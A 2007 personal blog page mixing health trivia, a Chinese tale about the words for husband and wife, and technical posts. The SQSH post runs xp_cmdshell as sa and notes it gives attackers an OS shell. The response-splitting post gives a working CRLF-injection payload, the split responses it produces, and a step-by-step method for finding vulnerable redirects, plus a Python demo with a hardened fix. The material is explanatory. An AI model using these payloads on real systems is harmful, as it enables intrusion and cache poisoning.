魔杰夫 - 'The immature-minded' and dogs not admitted

December 31, 2007

Convert Files To PDF Online

Filed under: Tech — jfree @ 2:17 pm

If you don’t have access to the right desktop software, a few webapps will convert files to PDF and email you the result. Web site PDF Online lets you convert a bevy of document types to PDF online, sending the resulting PDF to your email address as an attachment.

Somewhat disappointingly, PDF Online doesn't convert web pages by URL, but if you're looking for something along those lines, check out the previously posted RSS 2 PDF. It is a free online service that turns an RSS or OPML newsfeed into a PDF. It's lightning fast and creates a very readable, nicely formatted PDF for your offline reading pleasure.

Powered by ScribeFire.

Think While You Sleep

Filed under: Knowledge — jfree @ 2:12 pm

Your body may be resting, but your brain’s always at work.

Studies show that people given a mathematical problem before they went to bed were more likely to solve it the next morning. So if you're studying for a test or preparing for a presentation, review the material right before you turn off the lights.

“Since most memory consolidation happens during sleep, anything you read right before bed is more likely to be encoded as long-term memory,” says Men’s Health.


Different Function of Your L and R Ears

Filed under: Knowledge — jfree @ 2:10 pm

Your left ear and right ear have different specialties. “If you’re stuck chatting up a mumbler at a cocktail party, lean in with your right ear. It’s better than your left at following the rapid rhythms of speech, according to researchers at the UCLA David Geffen School of Medicine.

If, on the other hand, you’re trying to identify that song playing softly in the elevator, turn your left ear toward the sound. The left ear is better at picking up music tones.” (Source: Men’s Health)

Test your hearing superpowers on the mosquito tone, a high frequency that usually only young people can hear. See how the mosquito tone went down at Gawker HQ.


Scratch your leg to make it to the loo

Filed under: Knowledge — jfree @ 2:07 pm

Women trying to control a sudden, seemingly irrepressible urge to get to the bathroom need only scratch the back of their leg vigorously.

Scratch the back of your leg. "If you scratch or rub the back of your calf for a few moments, really vigorously, you may interrupt the message from your bladder to your brain just long enough for you to make it to the toilet," [continence expert Janetta] Webb said. (Source: Sydney Morning Herald)

Thinking about sex can help you hold it for a little extra time, too.


Stop brain freeze with your tongue

Filed under: Knowledge — jfree @ 2:01 pm

If you sip on that frozen margarita too fast, you’ll have an ice cream headache in no time. Stop it with a simple tongue technique:

"Press your tongue flat against the roof of your mouth, covering as much as you can. 'Since the nerves in the roof of your mouth get extremely cold, your body thinks your brain is freezing, too,' says [Ben Abo, an emergency medical-services specialist at the University of Pittsburgh]. 'In compensating, it overheats, causing an ice-cream headache.' The more pressure you apply to the roof of your mouth, the faster your headache will subside."


December 21, 2007

SQSH – MsSQL CLI Query Tool

Filed under: Tech — jfree @ 5:13 pm

SQSH (pronounced "skwish") is short for SQshelL. It is an open-source, shell-style command-line client for sending Transact-SQL to a Sybase ASE (Adaptive Server Enterprise) server and, through the FreeTDS library, to Microsoft SQL Server, and for receiving and displaying the results. It makes a handy debugging tool, and because it behaves like a Unix shell you can pipe the output of a query straight into other Unix commands for further processing.

To get started, install SQSH. It is available from http://www.sqsh.org or SourceForge. Binary packages exist on the site, but we are going to build version 2.1 from source. Untar the package and cd into sqsh-2.1. The SYBASE variable below points the build at the FreeTDS installation that provides the TDS client library sqsh links against; then:

host@machine [501]$ export SYBASE=/usr/local/freetds
host@machine [502]$ ./configure
–snip–
host@machine [503]$ make
–snip–
host@machine [504]$ su
Password:
root@machine [505]# make install
–snip–
root@machine [506]# ls -l /usr/local/bin/sqsh
-rwxr-xr-x 1 root root 287 May 22 13:25 /usr/local/bin/sqsh
root@machine [507]# ls -l /usr/local/bin/sqsh.bin
-rwxr-xr-x 1 root root 651472 May 22 13:25 /usr/local/bin/sqsh.bin

Next, let's use the tool, starting with a login to the SQL server:

host@machine [501]$ sqsh -S {system name/IP}:{port num} -U {username} -P {password}

For example:

host@machine [501]$ sqsh -S 10.0.0.10:1433 -U sa -P sa

This logs you in with whatever privileges that account holds. Do not put the password on the command line, though: every other user on the machine can read it with ps(1), and it ends up in your shell history as well. Leave out -P and sqsh prompts for the password instead:

host@machine [501]$ sqsh -S 10.0.0.10:1433 -U sa
sqsh-2.1 Copyright (C) 1995-2001 Scott C. Gray
This is free software with ABSOLUTELY NO WARRANTY
For more information type ‘\warranty’
Password:

–snip–

(7 rows affected)

1> xp_cmdshell 'date'
2> go

        output
        ------------------------------------------------------------
        The current date is: Fri 21/12/2007

        Enter the new date: (dd-mm-yy)

(2 rows affected)

(2 rows affected)

(2 rows affected)

The command runs on the database host under the SQL Server service account, which is what makes xp_cmdshell interesting from an attacker's point of view: a login with sysadmin rights, such as sa here, is effectively an OS shell on the server. On SQL Server 2005 and later xp_cmdshell is disabled by default and has to be switched on with sp_configure before this works.


December 20, 2007

Configuring TCP/IP Statically in Linux

Filed under: Poem, Tech — jfree @ 11:00 pm

Setting an IP address, default gateway and so on has never been painful for me in the Windows world; Linux is a different story, though it is still fairly easy.

Each Linux distribution keeps its network configuration in a different place. Debian, for instance, keeps the IP information in /etc/network/interfaces; a static entry there names the interface (iface eth0 inet static) and gives its address, netmask and gateway. Editing that file makes the TCP/IP settings for the workstation permanent: the changes survive a reboot.

The other method, command-line configuration, takes effect immediately but only temporarily. Two commands are enough:

host:~# ifconfig eth0 {ip add} netmask {subnet mask}
host:~# route add default gw {gateway add}

The first command configures the first Ethernet interface, eth0, with {ip add} as its IP address and {subnet mask} as its netmask. The second sets the system's default gateway. Note that this configuration is lost as soon as the interface goes down or the machine reboots.

Finally, to check whether the TCP/IP changes have taken effect, look at the routing table with either of:

route

or

netstat -nr

Either command prints the routing table, where the new default route should appear; ifconfig eth0 confirms the address and mask on the interface itself.

ps: You need superuser privilege to change the configuration; "sudo bash" works in some setups.


December 13, 2007

Why is a husband called "老公" and a wife called "老婆"?

It is said to come from a story of the Tang dynasty.

In the Tang dynasty there was a scholar named Mai Aixin (麥愛新). Seeing that his wife had grown old and lost her looks, he thought of casting her aside and taking a new favourite, and wrote the first line of a couplet and left it on his desk:

「荷敗蓮殘,落葉歸根成老藕。」 ("The lotus withers, the blossoms fade; fallen leaves return to the root and become old lotus root.")

His wife saw it and read in the couplet his intention to abandon the old and take the new, so she picked up the brush and added the matching second line:

「禾黃稻熟,吹糠見米現新糧。」 ("The grain turns golden, the rice ripens; winnow the chaff and the new grain appears.")

"Grain and rice" (禾稻) answers "lotus" (荷蓮), and "new grain" (新糧) answers "old lotus root" (老藕): the line is not only tidy, apt, fresh and plain, but "new grain" (新糧) is also a homophone of "new bride" (新娘), which makes it witty.
Reading his wife's line, Mai Aixin was moved by her quick wit and devotion and gave up the idea of abandoning the old for the new.
Seeing that her husband had changed his mind and not forgotten their old affection, the wife took up the brush and wrote:

「老公十分公道。」 ("My husband (老公) is entirely fair.")

Mai Aixin wrote the matching line in reply:

「老婆一片婆心。」 ("My wife (老婆) has a heart full of kindness.")

This edifying story spread quickly and has been passed down through the generations as a tale well told.


December 12, 2007

Don't use the hand dryers in public toilets

Filed under: Knowledge — jfree @ 12:23 pm

Toilets in public places usually have hand dryers; after washing, a quick blast leaves your hands dry, so they are very convenient and heavily used.

But recent medical research points out that a toilet's hand dryer sits for long periods in warm, humid air and is never disinfected, so it has long since become a breeding ground for bacteria. As it dries your freshly washed hands it blows those bacteria right onto them, and if your hands then touch your mouth or nose the bacteria get into the body. So when using a toilet in a public place, dry your hands with paper after washing and stop using the dryer.


December 11, 2007

HTTP Response Splitting Attack

Filed under: Web App Hack — jfree @ 10:52 pm

Recently I came across a method of attacking web applications called HTTP Response Splitting, also known as CRLF injection. (It is probably not a new attack vector, but it was new to me.) The vulnerability arises when user input is copied, unsanitized, into a response header, typically the Location header of a 302 redirect or a Set-Cookie header. When the application fails to sanitize that input, the consequences include Cross-Site Scripting (XSS), cross-user defacement (a temporary defacement served to another user), web cache poisoning, browser cache poisoning, and more.

A well-written web application rejects illegal characters in such input, specifically CR (carriage return, %0d or \r) and LF (line feed, %0a or \n). Those characters not only give attackers control of the remaining headers and body of the response the application intended to send, but also let them append additional responses entirely under their control. Modern servers and frameworks generally refuse to emit a header value containing a bare CR or LF, but the check belongs at the application boundary regardless.

A word on CR and LF: HTTP/1.1 defines the sequence CR LF as the end-of-line marker for every protocol element except the entity body. Per the standard, headers are separated from each other by one CRLF, and the headers are separated from the body by two. Failing to strip CRs and LFs therefore lets the attacker set arbitrary headers, take control of the body, or break the response into two or more separate responses (hence the name).

Now let's walk through launching an HTTP Response Splitting attack. The usual targets are pages that redirect based on a parameter, for instance a language selector: you have surely met sites that ask you to pick a language before they send you on to the inner pages. Those are our targets. Instead of choosing a language such as English, we send a value that uses URL-encoded CRLF sequences to terminate the current response and shape an additional one:

/redir_lang.php?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a%3Chtml%3EHacked%3C/html%3E

Because the server copies the decoded parameter into the Location header, it sends back the following byte stream, which an HTTP client parses as two responses:

HTTP/1.1 302 Moved Temporarily
Date: Mon, 10 Dec 2007 20:00:20 GMT
Location: http://victim/redir_lang.php?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Hacked</html>

A client (or an intermediate proxy or cache) that sends two requests over the same connection, the redirect followed by a second request for some other page, pairs the first request with the first response:

HTTP/1.1 302 Moved Temporarily
Date: Mon, 10 Dec 2007 20:00:20 GMT
Location: http://victim/redir_lang.php?lang=foobar
Content-Length: 0

The second request (say, for /anything.html) is then matched to the second, attacker-supplied response, which is how the cache of a shared proxy ends up poisoned with the attacker's page under a URL of the attacker's choosing:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Hacked</html>

To conclude, and to keep things simple, here is my KISS methodology:

For redirection response splitting:

  1. Locate a redirect on the site. Manual inspection will find them.
  2. Find out what kind of redirect it is by slowing it down in Burp Proxy with interception of server responses turned on (turn off the text bullet).
  3. If it is a META refresh or a JavaScript redirect it is not vulnerable to response splitting (it may still be vulnerable to XSS). If it is an HTTP-level redirect, a 301, 302, 303 or 307 with a Location header, chances are it is vulnerable.
  4. Replace the value that ends up in the Location header (the "http://victim…" URL in many redirectors) with "%0d%0a[www.whatever]…" and hit the redirection again. If the response shows the %0d%0a turned into an actual CR/LF, there is a very high probability that it is vulnerable.
  5. Lastly, try a full header injection with something like %0d%0aContent-Type:%20text/html%0d%0a…
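As an added example, not code from the original post or from any real redirector, the Python below models the redir_lang.php behaviour described above together with the checks in steps 4 and 5. vulnerable_redirect copies the decoded parameter into the Location header; split_responses parses the resulting byte stream the way a keep-alive client or shared proxy does, so the post's payload comes back as two responses; safe_redirect is the fix the post recommends, rejecting CR/LF and only ever echoing a value from an allowlist. The function names, the allowlist and the Location target are assumptions made for the demonstration.

```python
"""HTTP response splitting, modelled end to end.

Added example for this post; it is not code from the original page and does
not model any particular product. The handler names (vulnerable_redirect,
safe_redirect), the parser (split_responses) and the language allowlist are
assumptions made for the demonstration.
"""
import re
from urllib.parse import unquote

CRLF = "\r\n"

# The post's payload, joined onto one line, exactly as it travels in the query
# string. %0d%0a is CRLF, %20 is a space, %3C and %3E are < and >.
PAYLOAD = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2019%0d%0a%0d%0a%3Chtml%3EHacked%3C/html%3E"
)

# Constructed allowlist for the hardened handler (assumption, not from the page).
ALLOWED_LANGS = {"en", "fr", "de"}


def decoded_payload() -> str:
    """The payload as the web server sees it after URL decoding."""
    return unquote(PAYLOAD)


def vulnerable_redirect(lang: str) -> str:
    """The redir_lang.php behaviour the post describes: the decoded query
    parameter is copied straight into the Location header of a 302."""
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: http://victim/redir_lang.php?lang=" + lang + CRLF
        + CRLF
    )


def safe_redirect(lang: str) -> str:
    """Hardened version: refuse CR, LF and NUL outright, and only echo a value
    from a fixed allowlist, so attacker-controlled bytes never reach a header."""
    if re.search(r"[\r\n\x00]", lang):
        raise ValueError("control character in header value")
    if lang not in ALLOWED_LANGS:
        lang = "en"  # unknown selection: fall back rather than reflect input
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: http://victim/redir_lang.php?lang=" + lang + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def split_responses(stream: str) -> list:
    """Parse a byte stream the way a keep-alive client or proxy does: status
    line, headers up to the blank line, then exactly Content-Length bytes of
    body, repeated until the stream runs out. Every extra 'HTTP/' status line
    found this way is a response the attacker manufactured."""
    responses = []
    pos = 0
    while True:
        end = stream.find(CRLF + CRLF, pos)
        if end == -1:
            break
        head = stream[pos:end].split(CRLF)
        if not head[0].startswith("HTTP/"):
            break  # trailing bytes that are not a status line
        headers = {}
        for line in head[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + len(CRLF + CRLF)
        body = stream[body_start:body_start + length]
        responses.append({"status": head[0], "headers": headers, "body": body})
        pos = body_start + length
    return responses


def is_split(stream: str) -> bool:
    """Step-5 check: more than one status line came back for one request."""
    return len(split_responses(stream)) > 1


if __name__ == "__main__":
    for i, r in enumerate(split_responses(vulnerable_redirect(decoded_payload())), 1):
        print(f"response {i}: {r['status']} body={r['body']!r}")
    try:
        safe_redirect(decoded_payload())
    except ValueError as exc:
        print("hardened handler rejected the payload:", exc)
```

Run it directly and the vulnerable handler's single reply prints as two responses, the second carrying the attacker's HTML, while the hardened handler refuses the payload. Rejecting CR/LF is the fix the post asks for; the allowlist goes one step further and stops the redirector from reflecting arbitrary values into Location at all.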



Blog at WordPress.com.